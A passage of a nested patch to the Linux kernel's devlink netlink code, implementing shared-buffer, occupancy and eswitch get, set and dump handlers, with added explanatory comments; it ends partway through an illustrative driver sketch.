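++/* Note: in devlink_nl_cmd_linecard_set_doit() above, an empty
++ * DEVLINK_ATTR_LINECARD_TYPE string selects unprovisioning; this is
++ * how userspace asks for "no type" (e.g. `devlink lc set ... notype`
++ * in iproute2, if I read the userspace convention correctly).
++ */
++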
++static int devlink_nl_sb_fill(struct sk_buff *msg, struct devlink *devlink,
++			      struct devlink_sb *devlink_sb,
++			      enum devlink_command cmd, u32 portid,
++			      u32 seq, int flags)
++{
++	void *hdr;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_SIZE, devlink_sb->size))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_INGRESS_POOL_COUNT,
++			devlink_sb->ingress_pools_count))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_EGRESS_POOL_COUNT,
++			devlink_sb->egress_pools_count))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_INGRESS_TC_COUNT,
++			devlink_sb->ingress_tc_count))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_EGRESS_TC_COUNT,
++			devlink_sb->egress_tc_count))
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_sb_get_doit(struct sk_buff *skb,
++				      struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_sb *devlink_sb;
++	struct sk_buff *msg;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_sb_fill(msg, devlink, devlink_sb,
++				 DEVLINK_CMD_SB_NEW,
++				 info->snd_portid, info->snd_seq, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_sb_get_dumpit(struct sk_buff *msg,
++					struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	struct devlink_sb *devlink_sb;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_sb_fill(msg, devlink, devlink_sb,
++						 DEVLINK_CMD_SB_NEW,
++						 NETLINK_CB(cb->skb).portid,
++						 cb->nlh->nlmsg_seq,
++						 NLM_F_MULTI);
++			if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_nl_sb_pool_fill(struct sk_buff *msg, struct devlink *devlink,
++				   struct devlink_sb *devlink_sb,
++				   u16 pool_index, enum devlink_command cmd,
++				   u32 portid, u32 seq, int flags)
++{
++	struct devlink_sb_pool_info pool_info;
++	void *hdr;
++	int err;
++
++	err = devlink->ops->sb_pool_get(devlink, devlink_sb->index,
++					pool_index, &pool_info);
++	if (err)
++		return err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_POOL_INDEX, pool_index))
++		goto nla_put_failure;
++	if (nla_put_u8(msg, DEVLINK_ATTR_SB_POOL_TYPE, pool_info.pool_type))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_POOL_SIZE, pool_info.size))
++		goto nla_put_failure;
++	if (nla_put_u8(msg, DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE,
++		       pool_info.threshold_type))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_POOL_CELL_SIZE,
++			pool_info.cell_size))
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_sb_pool_get_doit(struct sk_buff *skb,
++					   struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_sb *devlink_sb;
++	struct sk_buff *msg;
++	u16 pool_index;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
++						  &pool_index);
++	if (err)
++		return err;
++
++	if (!devlink->ops->sb_pool_get)
++		return -EOPNOTSUPP;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_sb_pool_fill(msg, devlink, devlink_sb, pool_index,
++				      DEVLINK_CMD_SB_POOL_NEW,
++				      info->snd_portid, info->snd_seq, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int __sb_pool_get_dumpit(struct sk_buff *msg, int start, int *p_idx,
++				struct devlink *devlink,
++				struct devlink_sb *devlink_sb,
++				u32 portid, u32 seq)
++{
++	u16 pool_count = devlink_sb_pool_count(devlink_sb);
++	u16 pool_index;
++	int err;
++
++	for (pool_index = 0; pool_index < pool_count; pool_index++) {
++		if (*p_idx < start) {
++			(*p_idx)++;
++			continue;
++		}
++		err = devlink_nl_sb_pool_fill(msg, devlink,
++					      devlink_sb,
++					      pool_index,
++					      DEVLINK_CMD_SB_POOL_NEW,
++					      portid, seq, NLM_F_MULTI);
++		if (err)
++			return err;
++		(*p_idx)++;
++	}
++	return 0;
++}
++
++static int devlink_nl_cmd_sb_pool_get_dumpit(struct sk_buff *msg,
++					     struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	struct devlink_sb *devlink_sb;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		if (!devlink->ops->sb_pool_get)
++			goto retry;
++
++		devl_lock(devlink);
++		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
++			err = __sb_pool_get_dumpit(msg, start, &idx, devlink,
++						   devlink_sb,
++						   NETLINK_CB(cb->skb).portid,
++						   cb->nlh->nlmsg_seq);
++			if (err == -EOPNOTSUPP) {
++				err = 0;
++			} else if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++		}
++		devl_unlock(devlink);
++retry:
++		devlink_put(devlink);
++	}
++out:
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
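++/* The dumpit handlers above follow the usual netlink dump pattern:
++ * cb->args[0] records how many objects earlier passes already emitted,
++ * each pass skips `start` objects, and when a message fills up
++ * (-EMSGSIZE) the pass ends by returning msg->len so the netlink core
++ * calls back in to resume from `idx`.
++ */
++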
++static int devlink_sb_pool_set(struct devlink *devlink, unsigned int sb_index,
++			       u16 pool_index, u32 size,
++			       enum devlink_sb_threshold_type threshold_type,
++			       struct netlink_ext_ack *extack)
++{
++	const struct devlink_ops *ops = devlink->ops;
++
++	if (ops->sb_pool_set)
++		return ops->sb_pool_set(devlink, sb_index, pool_index,
++					size, threshold_type, extack);
++	return -EOPNOTSUPP;
++}
++
++static int devlink_nl_cmd_sb_pool_set_doit(struct sk_buff *skb,
++					   struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	enum devlink_sb_threshold_type threshold_type;
++	struct devlink_sb *devlink_sb;
++	u16 pool_index;
++	u32 size;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
++						  &pool_index);
++	if (err)
++		return err;
++
++	err = devlink_sb_th_type_get_from_info(info, &threshold_type);
++	if (err)
++		return err;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SB_POOL_SIZE))
++		return -EINVAL;
++
++	size = nla_get_u32(info->attrs[DEVLINK_ATTR_SB_POOL_SIZE]);
++	return devlink_sb_pool_set(devlink, devlink_sb->index,
++				   pool_index, size, threshold_type,
++				   info->extack);
++}
++
++static int devlink_nl_sb_port_pool_fill(struct sk_buff *msg,
++					struct devlink *devlink,
++					struct devlink_port *devlink_port,
++					struct devlink_sb *devlink_sb,
++					u16 pool_index,
++					enum devlink_command cmd,
++					u32 portid, u32 seq, int flags)
++{
++	const struct devlink_ops *ops = devlink->ops;
++	u32 threshold;
++	void *hdr;
++	int err;
++
++	err = ops->sb_port_pool_get(devlink_port, devlink_sb->index,
++				    pool_index, &threshold);
++	if (err)
++		return err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, devlink_port->index))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_POOL_INDEX, pool_index))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_THRESHOLD, threshold))
++		goto nla_put_failure;
++
++	if (ops->sb_occ_port_pool_get) {
++		u32 cur;
++		u32 max;
++
++		err = ops->sb_occ_port_pool_get(devlink_port, devlink_sb->index,
++						pool_index, &cur, &max);
++		if (err && err != -EOPNOTSUPP)
++			goto sb_occ_get_failure;
++		if (!err) {
++			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_CUR, cur))
++				goto nla_put_failure;
++			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_MAX, max))
++				goto nla_put_failure;
++		}
++	}
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	err = -EMSGSIZE;
++sb_occ_get_failure:
++	genlmsg_cancel(msg, hdr);
++	return err;
++}
++
++static int devlink_nl_cmd_sb_port_pool_get_doit(struct sk_buff *skb,
++						struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct devlink *devlink = devlink_port->devlink;
++	struct devlink_sb *devlink_sb;
++	struct sk_buff *msg;
++	u16 pool_index;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
++						  &pool_index);
++	if (err)
++		return err;
++
++	if (!devlink->ops->sb_port_pool_get)
++		return -EOPNOTSUPP;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_sb_port_pool_fill(msg, devlink, devlink_port,
++					   devlink_sb, pool_index,
++					   DEVLINK_CMD_SB_PORT_POOL_NEW,
++					   info->snd_portid, info->snd_seq, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int __sb_port_pool_get_dumpit(struct sk_buff *msg, int start, int *p_idx,
++				     struct devlink *devlink,
++				     struct devlink_sb *devlink_sb,
++				     u32 portid, u32 seq)
++{
++	struct devlink_port *devlink_port;
++	u16 pool_count = devlink_sb_pool_count(devlink_sb);
++	u16 pool_index;
++	int err;
++
++	list_for_each_entry(devlink_port, &devlink->port_list, list) {
++		for (pool_index = 0; pool_index < pool_count; pool_index++) {
++			if (*p_idx < start) {
++				(*p_idx)++;
++				continue;
++			}
++			err = devlink_nl_sb_port_pool_fill(msg, devlink,
++							   devlink_port,
++							   devlink_sb,
++							   pool_index,
++							   DEVLINK_CMD_SB_PORT_POOL_NEW,
++							   portid, seq,
++							   NLM_F_MULTI);
++			if (err)
++				return err;
++			(*p_idx)++;
++		}
++	}
++	return 0;
++}
++
++static int devlink_nl_cmd_sb_port_pool_get_dumpit(struct sk_buff *msg,
++						  struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	struct devlink_sb *devlink_sb;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		if (!devlink->ops->sb_port_pool_get)
++			goto retry;
++
++		devl_lock(devlink);
++		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
++			err = __sb_port_pool_get_dumpit(msg, start, &idx,
++							devlink, devlink_sb,
++							NETLINK_CB(cb->skb).portid,
++							cb->nlh->nlmsg_seq);
++			if (err == -EOPNOTSUPP) {
++				err = 0;
++			} else if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++		}
++		devl_unlock(devlink);
++retry:
++		devlink_put(devlink);
++	}
++out:
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_sb_port_pool_set(struct devlink_port *devlink_port,
++				    unsigned int sb_index, u16 pool_index,
++				    u32 threshold,
++				    struct netlink_ext_ack *extack)
++{
++	const struct devlink_ops *ops = devlink_port->devlink->ops;
++
++	if (ops->sb_port_pool_set)
++		return ops->sb_port_pool_set(devlink_port, sb_index,
++					     pool_index, threshold, extack);
++	return -EOPNOTSUPP;
++}
++
++static int devlink_nl_cmd_sb_port_pool_set_doit(struct sk_buff *skb,
++						struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_sb *devlink_sb;
++	u16 pool_index;
++	u32 threshold;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
++						  &pool_index);
++	if (err)
++		return err;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SB_THRESHOLD))
++		return -EINVAL;
++
++	threshold = nla_get_u32(info->attrs[DEVLINK_ATTR_SB_THRESHOLD]);
++	return devlink_sb_port_pool_set(devlink_port, devlink_sb->index,
++					pool_index, threshold, info->extack);
++}
++
++static int
++devlink_nl_sb_tc_pool_bind_fill(struct sk_buff *msg, struct devlink *devlink,
++				struct devlink_port *devlink_port,
++				struct devlink_sb *devlink_sb, u16 tc_index,
++				enum devlink_sb_pool_type pool_type,
++				enum devlink_command cmd,
++				u32 portid, u32 seq, int flags)
++{
++	const struct devlink_ops *ops = devlink->ops;
++	u16 pool_index;
++	u32 threshold;
++	void *hdr;
++	int err;
++
++	err = ops->sb_tc_pool_bind_get(devlink_port, devlink_sb->index,
++				       tc_index, pool_type,
++				       &pool_index, &threshold);
++	if (err)
++		return err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_PORT_INDEX, devlink_port->index))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_INDEX, devlink_sb->index))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_TC_INDEX, tc_index))
++		goto nla_put_failure;
++	if (nla_put_u8(msg, DEVLINK_ATTR_SB_POOL_TYPE, pool_type))
++		goto nla_put_failure;
++	if (nla_put_u16(msg, DEVLINK_ATTR_SB_POOL_INDEX, pool_index))
++		goto nla_put_failure;
++	if (nla_put_u32(msg, DEVLINK_ATTR_SB_THRESHOLD, threshold))
++		goto nla_put_failure;
++
++	if (ops->sb_occ_tc_port_bind_get) {
++		u32 cur;
++		u32 max;
++
++		err = ops->sb_occ_tc_port_bind_get(devlink_port,
++						   devlink_sb->index,
++						   tc_index, pool_type,
++						   &cur, &max);
++		if (err && err != -EOPNOTSUPP)
++			return err;
++		if (!err) {
++			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_CUR, cur))
++				goto nla_put_failure;
++			if (nla_put_u32(msg, DEVLINK_ATTR_SB_OCC_MAX, max))
++				goto nla_put_failure;
++		}
++	}
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_sb_tc_pool_bind_get_doit(struct sk_buff *skb,
++						   struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct devlink *devlink = devlink_port->devlink;
++	struct devlink_sb *devlink_sb;
++	struct sk_buff *msg;
++	enum devlink_sb_pool_type pool_type;
++	u16 tc_index;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	err = devlink_sb_pool_type_get_from_info(info, &pool_type);
++	if (err)
++		return err;
++
++	err = devlink_sb_tc_index_get_from_info(devlink_sb, info,
++						pool_type, &tc_index);
++	if (err)
++		return err;
++
++	if (!devlink->ops->sb_tc_pool_bind_get)
++		return -EOPNOTSUPP;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_sb_tc_pool_bind_fill(msg, devlink, devlink_port,
++					      devlink_sb, tc_index, pool_type,
++					      DEVLINK_CMD_SB_TC_POOL_BIND_NEW,
++					      info->snd_portid,
++					      info->snd_seq, 0);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int __sb_tc_pool_bind_get_dumpit(struct sk_buff *msg,
++					int start, int *p_idx,
++					struct devlink *devlink,
++					struct devlink_sb *devlink_sb,
++					u32 portid, u32 seq)
++{
++	struct devlink_port *devlink_port;
++	u16 tc_index;
++	int err;
++
++	list_for_each_entry(devlink_port, &devlink->port_list, list) {
++		for (tc_index = 0;
++		     tc_index < devlink_sb->ingress_tc_count; tc_index++) {
++			if (*p_idx < start) {
++				(*p_idx)++;
++				continue;
++			}
++			err = devlink_nl_sb_tc_pool_bind_fill(msg, devlink,
++							      devlink_port,
++							      devlink_sb,
++							      tc_index,
++							      DEVLINK_SB_POOL_TYPE_INGRESS,
++							      DEVLINK_CMD_SB_TC_POOL_BIND_NEW,
++							      portid, seq,
++							      NLM_F_MULTI);
++			if (err)
++				return err;
++			(*p_idx)++;
++		}
++		for (tc_index = 0;
++		     tc_index < devlink_sb->egress_tc_count; tc_index++) {
++			if (*p_idx < start) {
++				(*p_idx)++;
++				continue;
++			}
++			err = devlink_nl_sb_tc_pool_bind_fill(msg, devlink,
++							      devlink_port,
++							      devlink_sb,
++							      tc_index,
++							      DEVLINK_SB_POOL_TYPE_EGRESS,
++							      DEVLINK_CMD_SB_TC_POOL_BIND_NEW,
++							      portid, seq,
++							      NLM_F_MULTI);
++			if (err)
++				return err;
++			(*p_idx)++;
++		}
++	}
++	return 0;
++}
++
++static int
++devlink_nl_cmd_sb_tc_pool_bind_get_dumpit(struct sk_buff *msg,
++					  struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	struct devlink_sb *devlink_sb;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		if (!devlink->ops->sb_tc_pool_bind_get)
++			goto retry;
++
++		devl_lock(devlink);
++		list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
++			err = __sb_tc_pool_bind_get_dumpit(msg, start, &idx,
++							   devlink,
++							   devlink_sb,
++							   NETLINK_CB(cb->skb).portid,
++							   cb->nlh->nlmsg_seq);
++			if (err == -EOPNOTSUPP) {
++				err = 0;
++			} else if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++		}
++		devl_unlock(devlink);
++retry:
++		devlink_put(devlink);
++	}
++out:
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_sb_tc_pool_bind_set(struct devlink_port *devlink_port,
++				       unsigned int sb_index, u16 tc_index,
++				       enum devlink_sb_pool_type pool_type,
++				       u16 pool_index, u32 threshold,
++				       struct netlink_ext_ack *extack)
++{
++	const struct devlink_ops *ops = devlink_port->devlink->ops;
++
++	if (ops->sb_tc_pool_bind_set)
++		return ops->sb_tc_pool_bind_set(devlink_port, sb_index,
++						tc_index, pool_type,
++						pool_index, threshold, extack);
++	return -EOPNOTSUPP;
++}
++
++static int devlink_nl_cmd_sb_tc_pool_bind_set_doit(struct sk_buff *skb,
++						   struct genl_info *info)
++{
++	struct devlink_port *devlink_port = info->user_ptr[1];
++	struct devlink *devlink = info->user_ptr[0];
++	enum devlink_sb_pool_type pool_type;
++	struct devlink_sb *devlink_sb;
++	u16 tc_index;
++	u16 pool_index;
++	u32 threshold;
++	int err;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	err = devlink_sb_pool_type_get_from_info(info, &pool_type);
++	if (err)
++		return err;
++
++	err = devlink_sb_tc_index_get_from_info(devlink_sb, info,
++						pool_type, &tc_index);
++	if (err)
++		return err;
++
++	err = devlink_sb_pool_index_get_from_info(devlink_sb, info,
++						  &pool_index);
++	if (err)
++		return err;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SB_THRESHOLD))
++		return -EINVAL;
++
++	threshold = nla_get_u32(info->attrs[DEVLINK_ATTR_SB_THRESHOLD]);
++	return devlink_sb_tc_pool_bind_set(devlink_port, devlink_sb->index,
++					   tc_index, pool_type,
++					   pool_index, threshold, info->extack);
++}
++
++static int devlink_nl_cmd_sb_occ_snapshot_doit(struct sk_buff *skb,
++					       struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	const struct devlink_ops *ops = devlink->ops;
++	struct devlink_sb *devlink_sb;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	if (ops->sb_occ_snapshot)
++		return ops->sb_occ_snapshot(devlink, devlink_sb->index);
++	return -EOPNOTSUPP;
++}
++
++static int devlink_nl_cmd_sb_occ_max_clear_doit(struct sk_buff *skb,
++						struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	const struct devlink_ops *ops = devlink->ops;
++	struct devlink_sb *devlink_sb;
++
++	devlink_sb = devlink_sb_get_from_info(devlink, info);
++	if (IS_ERR(devlink_sb))
++		return PTR_ERR(devlink_sb);
++
++	if (ops->sb_occ_max_clear)
++		return ops->sb_occ_max_clear(devlink, devlink_sb->index);
++	return -EOPNOTSUPP;
++}
++
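++/* The two handlers above expose shared-buffer occupancy tracking:
++ * sb_occ_snapshot() latches the current occupancy values in the device
++ * so a subsequent dump is self-consistent, and sb_occ_max_clear()
++ * resets the recorded maxima (watermarks). In iproute2 these should
++ * correspond to `devlink sb occupancy snapshot` and
++ * `devlink sb occupancy clearmax`, as far as I can tell.
++ */
++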
++static int devlink_nl_eswitch_fill(struct sk_buff *msg, struct devlink *devlink,
++				   enum devlink_command cmd, u32 portid,
++				   u32 seq, int flags)
++{
++	const struct devlink_ops *ops = devlink->ops;
++	enum devlink_eswitch_encap_mode encap_mode;
++	u8 inline_mode;
++	void *hdr;
++	int err = 0;
++	u16 mode;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	err = devlink_nl_put_handle(msg, devlink);
++	if (err)
++		goto nla_put_failure;
++
++	if (ops->eswitch_mode_get) {
++		err = ops->eswitch_mode_get(devlink, &mode);
++		if (err)
++			goto nla_put_failure;
++		err = nla_put_u16(msg, DEVLINK_ATTR_ESWITCH_MODE, mode);
++		if (err)
++			goto nla_put_failure;
++	}
++
++	if (ops->eswitch_inline_mode_get) {
++		err = ops->eswitch_inline_mode_get(devlink, &inline_mode);
++		if (err)
++			goto nla_put_failure;
++		err = nla_put_u8(msg, DEVLINK_ATTR_ESWITCH_INLINE_MODE,
++				 inline_mode);
++		if (err)
++			goto nla_put_failure;
++	}
++
++	if (ops->eswitch_encap_mode_get) {
++		err = ops->eswitch_encap_mode_get(devlink, &encap_mode);
++		if (err)
++			goto nla_put_failure;
++		err = nla_put_u8(msg, DEVLINK_ATTR_ESWITCH_ENCAP_MODE, encap_mode);
++		if (err)
++			goto nla_put_failure;
++	}
++
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return err;
++}
++
++static int devlink_nl_cmd_eswitch_get_doit(struct sk_buff *skb,
++					   struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct sk_buff *msg;
++	int err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_eswitch_fill(msg, devlink, DEVLINK_CMD_ESWITCH_GET,
++				      info->snd_portid, info->snd_seq, 0);
++
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_rate_nodes_check(struct devlink *devlink, u16 mode,
++				    struct netlink_ext_ack *extack)
++{
++	struct devlink_rate *devlink_rate;
++
++	list_for_each_entry(devlink_rate, &devlink->rate_list, list)
++		if (devlink_rate_is_node(devlink_rate)) {
++			NL_SET_ERR_MSG_MOD(extack, "Rate node(s) exist.");
++			return -EBUSY;
++		}
++	return 0;
++}
++
++static int devlink_nl_cmd_eswitch_set_doit(struct sk_buff *skb,
++					   struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	const struct devlink_ops *ops = devlink->ops;
++	enum devlink_eswitch_encap_mode encap_mode;
++	u8 inline_mode;
++	int err = 0;
++	u16 mode;
++
++	if (info->attrs[DEVLINK_ATTR_ESWITCH_MODE]) {
++		if (!ops->eswitch_mode_set)
++			return -EOPNOTSUPP;
++		mode = nla_get_u16(info->attrs[DEVLINK_ATTR_ESWITCH_MODE]);
++		err = devlink_rate_nodes_check(devlink, mode, info->extack);
++		if (err)
++			return err;
++		err = ops->eswitch_mode_set(devlink, mode, info->extack);
++		if (err)
++			return err;
++	}
++
++	if (info->attrs[DEVLINK_ATTR_ESWITCH_INLINE_MODE]) {
++		if (!ops->eswitch_inline_mode_set)
++			return -EOPNOTSUPP;
++		inline_mode = nla_get_u8(
++				info->attrs[DEVLINK_ATTR_ESWITCH_INLINE_MODE]);
++		err = ops->eswitch_inline_mode_set(devlink, inline_mode,
++						   info->extack);
++		if (err)
++			return err;
++	}
++
++	if (info->attrs[DEVLINK_ATTR_ESWITCH_ENCAP_MODE]) {
++		if (!ops->eswitch_encap_mode_set)
++			return -EOPNOTSUPP;
++		encap_mode = nla_get_u8(info->attrs[DEVLINK_ATTR_ESWITCH_ENCAP_MODE]);
++		err = ops->eswitch_encap_mode_set(devlink, encap_mode,
++						  info->extack);
++		if (err)
++			return err;
++	}
++
++	return 0;
++}
++
++int devlink_dpipe_match_put(struct sk_buff *skb,
++			    struct devlink_dpipe_match *match)
++{
++	struct devlink_dpipe_header *header = match->header;
++	struct devlink_dpipe_field *field = &header->fields[match->field_id];
++	struct nlattr *match_attr;
++
++	match_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_MATCH);
++	if (!match_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_u32(skb, DEVLINK_ATTR_DPIPE_MATCH_TYPE, match->type) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_INDEX, match->header_index) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_ID, header->id) ||
++	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_ID, field->id) ||
++	    nla_put_u8(skb, DEVLINK_ATTR_DPIPE_HEADER_GLOBAL, header->global))
++		goto nla_put_failure;
++
++	nla_nest_end(skb, match_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, match_attr);
++	return -EMSGSIZE;
++}
++EXPORT_SYMBOL_GPL(devlink_dpipe_match_put);
++
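++/* Illustrative sketch (not part of the original patch): a driver's
++ * matches_dump table op would typically call devlink_dpipe_match_put()
++ * once per match the table supports. The names my_header and
++ * MY_FIELD_DIP below are hypothetical placeholders.
++ *
++ *	static int my_table_matches_dump(void *priv, struct sk_buff *skb)
++ *	{
++ *		struct devlink_dpipe_match match = {
++ *			.type = DEVLINK_DPIPE_MATCH_TYPE_FIELD_EXACT,
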